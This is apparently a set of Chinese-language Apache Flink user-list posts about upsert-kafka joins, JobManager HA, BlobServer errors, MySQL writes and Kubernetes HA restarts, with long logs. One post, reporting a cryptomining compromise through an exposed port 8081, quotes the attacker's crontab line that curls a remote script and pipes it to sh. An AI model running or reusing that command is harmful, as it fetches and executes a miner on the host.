Re: Upsert kafka 作为 source 的几个问题
在做join时 ksql 会强制检查两个表的key是否相同,如果不同则报错,感觉这是一个比较好的方法。 你说 “目前 Upsert-kafka 要求具有相同key的数据在相同 partition 的。因为 kafka 仅保证 partiiton 内按 offset 读取,如果相同 key 的数据分布在不同 partition 的话,那么读取会乱序。” flink 中两个表不使用相同的key 也可以成功 join ,但数据会出现错误,这样的话,在编译sql时报错应该更好 -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: Upsert kafka 作为 source 的几个问题
我也想知道 flink 在对 kafka 消息进行 join 时,是否对按主键分区有要求,KSQL有强制性的要求 -- Sent from: http://apache-flink.147419.n8.nabble.com/
Flink job manager HA 是否可以像 Hadoop Name Node 一样手动重启?
Flink job manager HA 是否可以像 Hadoop Name Node 一样手动重启,同时保证集群正常运行? 我发现 job manager 占用内存似乎总是在缓慢不断增长,Hadoop Name Node 也有这个问题,我通过隔一段时间轮动重启Hadoop Name Node 解决这个问题,在HA模式下Flink job manager 是否可以轮动重启? -- Sent from: http://apache-flink.147419.n8.nabble.com/
什么原因导致 Could not connect to BlobServer ?
运行 1.12.2 standalone 集群,不定期会出现类似这种错误,请问这有可能是什么原因导致的?谢谢! Caused by: java.io.IOException: Failed to fetch BLOB fb90d0fce9ff3ad8353ea97e46f9c913/p-bc0d39187ed200f9df64f90463534862858961a2-2ff77a5adb95af29376c6699173c3969 from hb3-dev-gem-svc1-000/10.30.69.13:43003 and store it under /home/gum/flink_tmp/blobStore-e82a4a09-0f9c-4846-902c-b18c6fd09dae/incoming/temp-1153 at org.apache.flink.runtime.blob.BlobClient.downloadFromBlobServer(BlobClient.java:167) at org.apache.flink.runtime.blob.AbstractBlobCache.getFileInternal(AbstractBlobCache.java:166) at org.apache.flink.runtime.blob.PermanentBlobCache.getFile(PermanentBlobCache.java:187) at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$LibraryCacheEntry.createUserCodeClassLoader(BlobLibraryCacheManager.java:251) at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$LibraryCacheEntry.getOrResolveClassLoader(BlobLibraryCacheManager.java:228) at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$LibraryCacheEntry.access$1100(BlobLibraryCacheManager.java:199) at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$DefaultClassLoaderLease.getOrResolveClassLoader(BlobLibraryCacheManager.java:333) at org.apache.flink.runtime.taskmanager.Task.createUserCodeClassloader(Task.java:983) at org.apache.flink.runtime.taskmanager.Task.doRun(Task.java:632) at org.apache.flink.runtime.taskmanager.Task.run(Task.java:570) at java.lang.Thread.run(Thread.java:748) Caused by: java.io.IOException: Could not connect to BlobServer at address hb3-dev-gem-svc1-000/10.30.69.13:43003 at org.apache.flink.runtime.blob.BlobClient.(BlobClient.java:102) at org.apache.flink.runtime.blob.BlobClient.downloadFromBlobServer(BlobClient.java:137) ... 10 more Caused by: java.net.UnknownHostException: hb3-dev-gem-svc1-000 at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:184) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:607) at org.apache.flink.runtime.blob.BlobClient.(BlobClient.java:96) ... 11 more -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: flink 1.12.2-rc2 被挖矿
我不是安全专家,不知道如何才能确认是 flink 的问题,但从现象看跟之前 flink 1.10 遇到的问题非常类似,建议你们能有这方面的测试用例,也能把测试结果提供出来 -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: flink 1.12.2-rc2 被挖矿
我自己编译 https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz,然后部署在了服务器上,为了更新操作系统补丁,绑定了公网ip,这时 jobmanager 的 8081 端口就暴露在互联网上了,然后就有挖矿程序来了,在crontab 中增加了这行 * * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1 之前使用 1.10时也遇到过类似情况,我记得 1.12 似乎没有这个问题了,所以这次没有留意,就过有发生了,我基本可以确定是 flink 引起的,因为服务器是全新安装的,只启动了 flink 进程 -- Sent from: http://apache-flink.147419.n8.nabble.com/
flink 1.12.2-rc2 被挖矿
我编译的flink 1.12.2-rc2 被挖矿,这个漏洞之前不是堵住了吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: Fw:flinksql写入hive问题
有 checkpoint 吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: flink 1.12 中如何读取 mysql datetime 字段
我通过实验确认这是升级 MySql JDBC Driver 8.0.23 造成的,回到 MySql JDBC Driver 8.0.22,就没有问题,我提交了 issue https://issues.apache.org/jira/browse/FLINK-21240 -- Sent from: http://apache-flink.147419.n8.nabble.com/
flink 1.12 中如何读取 mysql datetime 字段
在 mysql 中创建表 CREATE TABLE `p_port_packet_loss_5m` ( `id` binary(16) NOT NULL, `coltime` datetime NOT NULL, ... 在flink 中创建表 create table if not exists p_port_packet_loss_5m ( id bytes, coltime timestamp, ...) WITH ( 'connector' = 'jdbc', 'url' = 'jdbc:mysql://ip:port/mydatabase', 在flink sql 客户端执行 select * from p_port_packet_loss_5m; 总是报错 java.lang.ClassCastException: java.time.LocalDateTime cannot be cast to java.sql.Timestamp 改了若干种数据类型都不行,这种情况该如何处理呢? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: 是否可以 hive 流 join hive 流?
当前的 1.13-snapshot 支持了吗?我可以试试吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: 是否可以 hive 流 join hive 流?
p1.time 是数据记录里的时间,也用这个时间做分区 -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: 请教 flink 1.12.1 插入 mysql 有时耗时很长
有时候这种job持续2个多小时,我只能cancel job,但无法正常 cancel,都会导致 taskmanager 挂掉,错误如下 2021-01-31 23:04:23,677 ERROR org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Task did not exit gracefully within 180 + seconds. org.apache.flink.util.FlinkRuntimeException: Task did not exit gracefully within 180 + seconds. at org.apache.flink.runtime.taskmanager.Task$TaskCancelerWatchDog.run(Task.java:1685) [flink-dist_2.11-1.12.1.jar:1.12.1] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_282] 2021-01-31 23:04:23,685 ERROR org.apache.flink.runtime.taskexecutor.TaskManagerRunner [] - Fatal error occurred while executing the TaskManager. Shutting it down... org.apache.flink.util.FlinkRuntimeException: Task did not exit gracefully within 180 + seconds. at org.apache.flink.runtime.taskmanager.Task$TaskCancelerWatchDog.run(Task.java:1685) [flink-dist_2.11-1.12.1.jar:1.12.1] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_282] 2021-01-31 23:04:23,686 INFO org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Stopping TaskExecutor akka.tcp://flink@10.13.69.52:45901/user/rpc/taskmanager_0. 2021-01-31 23:04:23,686 INFO org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Close ResourceManager connection 1bd159f361d86e77d17e261ab44b5128. 2021-01-31 23:04:23,689 WARN org.apache.flink.runtime.taskmanager.Task [] - Task 'Source: HiveSource-snmpprobe.p_port_traffic_5m -> Calc(select=[binaryid AS id, ver, CAST(2021-01-31 21:45:00:TIMESTAMP(6)) AS coltime, CAST(in_octets) AS in_octets, CAST(out_octets) AS out_octets, CAST(bi_octets) AS bi_octets, CAST(unimax_octets) AS unimax_octets, in_speed, out_speed, bi_speed, unimax_speed, in_util, out_util, bi_util, unimax_util, inout_ratio, bandwidth, origin, CAST((() DATE_FORMAT _UTF-16LE'-MM-dd HH:mm:ss')) AS crtime], where=[(coltime = 2021-01-31 21:45:00:TIMESTAMP(9))]) -> Sink: Sink(table=[myhive.prod_mysql_zqzynetdb.p_port_traffic_5m], fields=[id, ver, coltime, in_octets, out_octets, bi_octets, unimax_octets, in_speed, out_speed, bi_speed, unimax_speed, in_util, out_util, bi_util, unimax_util, inout_ratio, bandwidth, origin, crtime]) (1/1)#0' did not react to cancelling signal for 30 seconds, but is stuck in method: java.net.SocketInputStream.socketRead0(Native Method) java.net.SocketInputStream.socketRead(SocketInputStream.java:116) java.net.SocketInputStream.read(SocketInputStream.java:171) java.net.SocketInputStream.read(SocketInputStream.java:141) com.mysql.cj.protocol.ReadAheadInputStream.fill(ReadAheadInputStream.java:107) com.mysql.cj.protocol.ReadAheadInputStream.readFromUnderlyingStreamIfNecessary(ReadAheadInputStream.java:150) com.mysql.cj.protocol.ReadAheadInputStream.read(ReadAheadInputStream.java:180) java.io.FilterInputStream.read(FilterInputStream.java:133) com.mysql.cj.protocol.FullReadInputStream.readFully(FullReadInputStream.java:64) com.mysql.cj.protocol.a.SimplePacketReader.readHeader(SimplePacketReader.java:63) com.mysql.cj.protocol.a.SimplePacketReader.readHeader(SimplePacketReader.java:45) com.mysql.cj.protocol.a.TimeTrackingPacketReader.readHeader(TimeTrackingPacketReader.java:52) com.mysql.cj.protocol.a.TimeTrackingPacketReader.readHeader(TimeTrackingPacketReader.java:41) com.mysql.cj.protocol.a.MultiPacketReader.readHeader(MultiPacketReader.java:54) com.mysql.cj.protocol.a.MultiPacketReader.readHeader(MultiPacketReader.java:44) com.mysql.cj.protocol.a.NativeProtocol.readMessage(NativeProtocol.java:538) com.mysql.cj.protocol.a.NativeProtocol.checkErrorMessage(NativeProtocol.java:708) com.mysql.cj.protocol.a.NativeProtocol.sendCommand(NativeProtocol.java:647) com.mysql.cj.protocol.a.NativeProtocol.sendQueryPacket(NativeProtocol.java:946) com.mysql.cj.NativeSession.execSQL(NativeSession.java:1075) com.mysql.cj.jdbc.ClientPreparedStatement.executeInternal(ClientPreparedStatement.java:930) com.mysql.cj.jdbc.ClientPreparedStatement.executeUpdateInternal(ClientPreparedStatement.java:1092) com.mysql.cj.jdbc.ClientPreparedStatement.executeBatchSerially(ClientPreparedStatement.java:832) com.mysql.cj.jdbc.ClientPreparedStatement.executeBatchInternal(ClientPreparedStatement.java:435) com.mysql.cj.jdbc.StatementImpl.executeBatch(StatementImpl.java:796) org.apache.flink.connector.jdbc.statement.FieldNamedPreparedStatementImpl.executeBatch(FieldNamedPreparedStatementImpl.java:65) org.apache.flink.connector.jdbc.internal.executor.TableSimpleStatementExecutor.executeBatch(TableSimpleStatementExecutor.java:64) org.apache.flink.connector.jdbc.internal.executor.TableBufferReducedStatementExecutor.executeBatch(TableBufferReducedStatementExecutor.java:101) org.apache.flink.connector.jdbc.internal.JdbcBatchingOutputFormat.attemptFlush(JdbcBatchingOutputFormat.java:216) org.apache.flink.connector.jdbc.internal.JdbcBatchingOutputFormat.flush(JdbcBatchingOutputFormat.java:184) org.apache.flink.connector.jdbc.internal.JdbcBatchingOutputFormat.writeRecord(JdbcBatchingOutputFormat.java:167) org.apac
Re: 请教 flink 1.12.1 插入 mysql 有时耗时很长
打开了 debug 级别的日志,有这样的错误 2021-01-31 20:45:30,364 DEBUG org.apache.flink.runtime.io.network.partition.ResultPartitionManager [] - Released partition dc8a2804b6df6b0ceaee2610ccf6c6e5#312 produced by 448c5ac36dcda818f56ec5bbd728da10. 2021-01-31 20:45:30,392 DEBUG org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Free slot with allocation id 80a1592c9e59efd80e412e7dee99f70c because: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58). 2021-01-31 20:45:30,392 DEBUG org.apache.flink.runtime.taskexecutor.slot.TaskSlotTableImpl [] - Free slot TaskSlot(index:2, state:ACTIVE, resource profile: ResourceProfile{cpuCores=1., taskHeapMemory=344.000mb (360710140 bytes), taskOffHeapMemory=0 bytes, managedMemory=256.000mb (268435460 bytes), networkMemory=32.000mb (33554432 bytes)}, allocationId: 80a1592c9e59efd80e412e7dee99f70c, jobId: d055754b88483b13648cc3fb32d9cd58). org.apache.flink.util.FlinkException: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58). at org.apache.flink.runtime.jobmaster.JobMaster.onStop(JobMaster.java:416) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.runtime.rpc.RpcEndpoint.internalCallOnStop(RpcEndpoint.java:214) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.runtime.rpc.akka.AkkaRpcActor$StartedState.terminate(AkkaRpcActor.java:565) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleControlMessage(AkkaRpcActor.java:187) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:26) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:21) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at scala.PartialFunction$class.applyOrElse(PartialFunction.scala:123) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at akka.japi.pf.UnitCaseStatement.applyOrElse(CaseStatements.scala:21) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:170) [flink-dist_2.11-1.12.1.jar:1.12.1] at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:171) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.actor.Actor$class.aroundReceive(Actor.scala:517) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.actor.AbstractActor.aroundReceive(AbstractActor.scala:225) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.actor.ActorCell.receiveMessage(ActorCell.scala:592) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.actor.ActorCell.invoke(ActorCell.scala:561) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.Mailbox.processMailbox(Mailbox.scala:258) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.Mailbox.run(Mailbox.scala:225) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.Mailbox.exec(Mailbox.scala:235) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.forkjoin.ForkJoinTask.doExec(ForkJoinTask.java:260) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.forkjoin.ForkJoinPool$WorkQueue.runTask(ForkJoinPool.java:1339) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.forkjoin.ForkJoinPool.runWorker(ForkJoinPool.java:1979) [flink-dist_2.11-1.12.1.jar:1.12.1] at akka.dispatch.forkjoin.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:107) [flink-dist_2.11-1.12.1.jar:1.12.1] 2021-01-31 20:45:30,393 DEBUG org.apache.flink.runtime.state.TaskExecutorLocalStateStoresManager [] - Releasing local state under allocation id 80a1592c9e59efd80e412e7dee99f70c. 2021-01-31 20:45:30,393 DEBUG org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Free slot with allocation id 4606a6194b4380efb5c2f95fc65bf01e because: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58). 2021-01-31 20:45:30,393 DEBUG org.apache.flink.runtime.taskexecutor.slot.TaskSlotTableImpl [] - Free slot TaskSlot(index:12, state:ACTIVE, resource profile: ResourceProfile{cpuCores=1., taskHeapMemory=344.000mb (360710140 bytes), taskOffHeapMemory=0 bytes, managedMemory=256.000mb (268435460 bytes), networkMemory=32.000mb (33554432 bytes)}, allocationId: 4606a6194b4380efb5c2f95fc65bf01e, jobId: d055754b88483b13648cc3fb32d9cd58). org.apache.flink.util.FlinkException: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58). at org.apache.flink.runtime.jobmaster.JobMaster.onStop(JobMaster.java:416) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.runtime.rpc.RpcEndpoint.internalCallOnStop(RpcEndpoint.java:214) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.runtime.rpc.akka.AkkaRpcActor$StartedState.terminate(AkkaRpcActor.java:565) ~[flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.h
请教 flink 1.12.1 插入 mysql 有时耗时很长
周期性batch mode 从 hive 提取数据插入 mysql,每批次 10K 到 20K 行数据,多数情况下 10-20秒可以完成,但不定期就会很长时间,能达到 20多分钟,但也能成功,查看了日志也看不到错误,检查 mysql 也没有发现锁表,怀疑 hive metastore 的性能,但也没看出问题。 请教分析思路,从 flink 上能看出job 在等待什么吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
是否可以 hive 流 join hive 流?
具体需求是这样,采集取得的通道总流量5分钟一次存入 hive 表,为了取得 5 分钟内该通道的流量,需要前后2次采集到的总流量相减,我想用同一个 hive 表自己相互 join,形成 2 个 hive 流 join,不知道是否可以实现?或者有其他实现方法吗? 我现在使用 crontab 定时 batch 模式做,希望能改成 stream 模式 select p1.traffic -p2.traffic from p as p1 inner join p as p2 on p1.id=p2.id and p1.time=p2.time + interval 5 minutes -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: pyflink 1.12.1 没有 python 3.8 安装文件
谢谢!不好意思没有仔细读文档,现在哪里能下载build 好的 Linux 下的 Python 3.8 的 pyflink 1.12.1 吗?觉得自己build的还是不放心 -- Sent from: http://apache-flink.147419.n8.nabble.com/
pyflink 1.12.1 没有 python 3.8 安装文件
在 Linux python 3.8上无法安装 pyflink 1.12.1 ,最高是 1.12.0,查看可以提供的安装文件 https://pypi.org/project/apache-flink/#files 中,python 3.8 只有一个安装文件 apache_flink-1.12.1-cp38-cp38-macosx_10_9_x86_64.whl 。 而 pyflink 1.12.0 的 python 3.8 有 2个安装文件 apache_flink-1.12.0-cp38-cp38-manylinux1_x86_64.whl 和 apache_flink-1.12.0-cp38-cp38-macosx_10_9_x86_64.whl 。 pyflink 1.12.1 安装文件不全吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart
拿到了吗?有什么发现吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart
https://pan.baidu.com/s/1GHdfeF2y8RUW_Htgdn4KbQ 提取码: piaf -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart
可以的,怎么发给你? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart
多谢!打开了DEBUG日志,仍然只有最后一个ERROR,不过之前有不少包含 kubernetes.client.dsl.internal.WatchConnectionManager 的日志,grep 了一部分,能看出些什么吗? job-debug-0118.log:2021-01-19 02:12:25,551 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19 02:12:25,646 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@2553d42c job-debug-0118.log:2021-01-19 02:12:25,647 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19 02:12:30,128 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@5a9fa83e job-debug-0118.log:2021-01-19 02:12:30,176 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19 02:12:39,028 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@2553d42c job-debug-0118.log:2021-01-19 02:12:39,028 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@15b15029 job-debug-0118.log:2021-01-19 02:12:39,030 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 1000, reason: job-debug-0118.log:2021-01-19 02:12:39,030 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Ignoring onClose for already closed/closing websocket job-debug-0118.log:2021-01-19 02:12:39,031 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@2cdbe5a0 job-debug-0118.log:2021-01-19 02:12:39,031 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@1e3f5396 job-debug-0118.log:2021-01-19 02:12:39,033 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 1000, reason: job-debug-0118.log:2021-01-19 02:12:39,033 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Ignoring onClose for already closed/closing websocket job-debug-0118.log:2021-01-19 02:12:42,677 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@210aab4b job-debug-0118.log:2021-01-19 02:12:42,678 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19 02:12:42,920 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@278d8398 job-debug-0118.log:2021-01-19 02:12:42,921 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19 02:12:45,130 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@4b318628 job-debug-0118.log:2021-01-19 02:12:45,132 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened job-debug-0118.log:2021-01-19 02:13:05,927 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@278d8398 job-debug-0118.log:2021-01-19 02:13:05,927 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@69d1ebd2 job-debug-0118.log:2021-01-19 02:13:05,930 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 1000, reason: job-debug-0118.log:2021-01-19 02:13:05,930 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Ignoring onClose for already closed/closing websocket job-debug-0118.log:2021-01-19 02:13:05,940 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@210aab4b job-debug-0118.log:2021-01-19 02:13:05,940 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@3db9d8d8 job-debug-0118.log:2021-01-19 02:13:05,942 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 10
Re: K8s HA Session模式下1.12.1 jobmanager 周期性 restart
我查看了一下之前的日志,没有发现 too old resource version,而且连续几个日志都没有其他错误,直接就这个错误,restart,然后就是一个新日志了。 我用的k8s集群似乎网络确实不太稳定,请教一下如何测试Pod和APIServer之间的网络比较容易说明问题?ping?或者什么工具? -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: flink1.12.0 HA on k8s native运行一段时间后jobmanager-leader产生大量ConfigMap问题
您好,我刚刚开始使用 flink 1.12.1 HA on k8s,发现jobmanager大约半小时左右会restart,都是这种错误,您遇到过吗?谢谢! 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.slotpool.SlotPoolImpl [] - Suspending SlotPool. 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.JobMaster [] - Close ResourceManager connection 28ed7c84e7f395c5a34880df91b251c6: Stopping JobMaster for job p_port_traffic_5m@hive->mysql @2021-01-17 11:40:00(67fb9b15d0deff998e287aa7e2cf1c7b).. 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.slotpool.SlotPoolImpl [] - Stopping SlotPool. 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Disconnect job manager 8c450d0051eff8c045adb76cb9ec4...@akka.tcp://flink@flink-jobmanager:6123/user/rpc/jobmanager_32 for job 67fb9b15d0deff998e287aa7e2cf1c7b from the resource manager. 2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.leaderelection.DefaultLeaderElectionService [] - Stopping DefaultLeaderElectionService. 2021-01-17 04:52:12,399 INFO org.apache.flink.kubernetes.highavailability.KubernetesLeaderElectionDriver [] - Closing KubernetesLeaderElectionDriver{configMapName='test-flink-etl-67fb9b15d0deff998e287aa7e2cf1c7b-jobmanager-leader'}. 2021-01-17 04:52:12,399 INFO org.apache.flink.kubernetes.kubeclient.resources.KubernetesConfigMapWatcher [] - The watcher is closing. 2021-01-17 04:52:12,416 INFO org.apache.flink.runtime.jobmanager.DefaultJobGraphStore [] - Removed job graph 67fb9b15d0deff998e287aa7e2cf1c7b from KubernetesStateHandleStore{configMapName='test-flink-etl-dispatcher-leader'}. 2021-01-17 04:52:30,686 ERROR org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Fatal error occurred in ResourceManager. org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-12c0ac13184d3d98af71dadbc4a81d03-jobmanager-leader at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherToggle.java:56) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.closeEvent(WatchConnectionManager.java:367) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.access$700(WatchConnectionManager.java:50) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager$1.onMessage(WatchConnectionManager.java:259) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.onReadMessage(RealWebSocket.java:323) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.readMessageFrame(WebSocketReader.java:219) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.processNextFrame(WebSocketReader.java:105) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.loopReader(RealWebSocket.java:274) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket$2.onResponse(RealWebSocket.java:214) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.RealCall$AsyncCall.execute(RealCall.java:206) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.NamedRunnable.run(NamedRunnable.java:32) [flink-dist_2.11-1.12.1.jar:1.12.1] at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_275] at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_275] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_275] 2021-01-17 04:52:30,691 ERROR org.apache.flink.runtime.entrypoint.ClusterEntrypoint[] - Fatal error occurred in the cluster entrypoint. org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-12c0ac13184d3d98af71dadbc4a81d03-jobmanager-leader at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherTog
K8s HA Session模式下1.12.1 jobmanager 周期性 restart
